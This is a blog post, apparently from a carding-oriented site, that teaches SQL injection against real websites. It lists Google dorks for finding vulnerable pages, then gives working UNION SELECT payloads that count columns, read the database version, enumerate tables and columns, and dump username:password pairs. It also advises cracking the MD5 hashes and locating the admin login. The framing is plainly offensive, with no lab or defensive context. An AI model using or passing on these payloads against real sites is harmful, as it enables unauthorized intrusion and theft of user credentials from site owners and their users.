SQL INJECTION TUTORIAL BY SEANSTAR "TUTORIAL IN PICTURES"

Home »Unlabelled » SQL INJECTION TUTORIAL BY SEANSTAR "TUTORIAL IN PICTURES"

SQL INJECTION TUTORIAL BY SEANSTAR "TUTORIAL IN PICTURES"

12:55 AM Posted by CardingPower

My Guide to Sql Injection

Yes, I know there are a lot of guides out there for this.. but I'm going to try and add on a little, and maybe make it a bit easier to understand.

First of all, you are going to need a good google dork.

If you don't know what a google dork is.. well.. It's basically a google search query that yields results of sites that you may be able to exploit, ect.

Some examples:

Code:

inurl:post.php?id=

inurl:blog.php?id=

inurl:news.php?id=

inurl:index.php?page_id=

Now, you are going to have to be creative with this.. try different things.. like instead of id= on one, you may put page_id=.. or you can rename the php file to something that you think may yield appropriate results.

Once you do the search, I recommend opening every result on the page in a new tab.. then checking each site for vulnerability.

Step 1:
You can check if a site is vulnerable by placing a ' at the end of the url.

Example:

Code:

http://www.example.com/news.php?id=32'

Now, if the site displays an error, or it goes blank, you know that it is at least somewhat vulnerable.. but let's check further.

On the other hand, if the page redirects to another page, or it just doesn't change at all, close the page and try another.

Step 2:
Now to try the order by function. Erase that ' at the end and replace it with order by 1.

Example:

Code:

http://www.example.com/news.php?id=32 order by 1

If that displays an error/blank page, the site is not vulnerable, if not continue with this step.

Next try something ridiculous, like order by 9999.

If that displays an error/blank page, the site is good so far, if not the site is not vulnerable.

Now, the goal is to find the largest number that doesn't display an error/blank page. Once that is found, proceed to the next step.

I usually try going down in tens from 30 like this.
(Let's say the number is 8)

Code:

http://www.example.com/news.php?id=32 order by 30 (Error)

http://www.example.com/news.php?id=32 order by 20 (Error)

http://www.example.com/news.php?id=32 order by 10 (Error)

http://www.example.com/news.php?id=32 order by 5 (Regular)

http://www.example.com/news.php?id=32 order by 7 (Regular)

http://www.example.com/news.php?id=32 order by 8 (Regular)

http://www.example.com/news.php?id=32 order by 9 (Error)

So I found out the number is 8.

NOTE: In some cases, if order by 1 displays an error, you can continue to step 3 and try to guess the number with union select.

Step 3:
Alright, so far the site is looking vulnerable! Time for the finale test.
Erase the order by statement, and insert a - between the equal sign and the number. Then add to the end UNION SELECT *Number from the previous step counted from 1 seperated by comma's*.

This is kinda hard to explain in words. To get the idea, here is an example:

Code:

http://www.example.com/news.php?id=-32 UNION SELECT 1,2,3,4,5,6,7,8

Don't forget the dash! (id=-32) rather than (id=32)

Now, if this displays an error/blank page, just move on to the next site.

If it displays a couple numbers on the page, congrats! The site is vulnerable! Pirate

Step 4:
Now that you know the site is vulnerable, it's time to inject into one of those numbers. Find a number on the page that you want to use. For this example, let's say I found a 2 on the page. You can use any number you see on the page.

Now to check the version.

Replace the 2 in the number set after UNION SELECT with @@version.

Example:

Code:

http://www.example.com/news.php?id=-32 UNION SELECT 1,@@version,3,4,5,6,7,8

Now you will see the version where the 2 was on the page.

If the version is 4, you can either guess the tables or you can skip the site.
(Go to step 6 on how to insert the tables)

If the version is 5, you can grab the tables with a special command.

Step 5:
Alright, with version 5 you need to put replace @@version with group_concat(table_name) and add from information_schema.tables where table_schema= database () to the end of the entire url.

Example:

Code:

http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema= database ()

This should display all the tables in the database. Find something with users or admin in it.

Now to see the column names contained in that table. So copy the table name you want to get the data from and use a tool like the "HackBar" addon for firefox to convert it to a MySql CHAR() string. Let's say the table name is users. I convert that to CHAR(117, 115, 101, 114, 115).

Now to edit the group_concat(table_name) to group_concat(column_name), the information_schema.tables to information_schema.columns, and the table_schema= database () to table_name= CHAR(#'s)

#'s = The numbers that were in the string you generated.

Example:

Code:

http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8 from information_schema.columns where table_name= CHAR(117, 115, 101, 114, 115)

This will display the column names.
Like.. username,password.

Step 6:
Finally, replace group_concat(column_name) with group_concat(columnname,0x3a,anothercolumnname).

columnname = a column name you found
anothercolumnname = another column name you found.
0x3a = a colon.

And replace the whole from statement with the table that contains those columns

Example:

Code:

http://www.example.com/news.php?id=-32 UNION SELECT 1,group_concat(username,0x3a,password),3,4,5,6,7,8 from users

And there you go.. that should display the username:password..
If there is one, that is likely the admin username/password.

NOTE: Most of the time, the password is md5 encrypted.. just lookup an md5 database to check it against, or crack it yourself.

Step 7:
Now to find where to enter this admin info.

I recommend the admin finder, which can be found here.

[Image: page7a.png]